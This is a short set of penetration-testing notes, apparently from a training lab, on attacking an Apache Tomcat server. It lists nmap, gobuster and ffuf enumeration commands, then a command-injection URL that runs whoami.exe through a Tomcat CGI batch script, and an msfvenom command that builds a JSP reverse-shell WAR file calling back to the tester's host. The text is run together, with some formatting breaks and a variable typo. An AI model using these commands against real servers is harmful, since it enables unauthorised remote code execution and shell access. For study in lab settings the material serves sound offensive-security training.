finding
Enumeration
nmap -p- -sC -Pn 10.129.204.227 --open gobuster dir -u http://web01."$domain":8180/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txtFootprinting
/invalidcurl -s http://app-dev."$doman":8080/docs/ | grep Tomcatffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat
#FUZZ.cmd
#FUZZ.ps1
#Combine script path and below vulnerability to exploit this vulnerability.http://10.129.204.227:8080/cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exemsfvenom -p java/jsp_shell_reverse_tcp LHOST=<local-ip> LPORT=80 -f war -o shell.warLast updated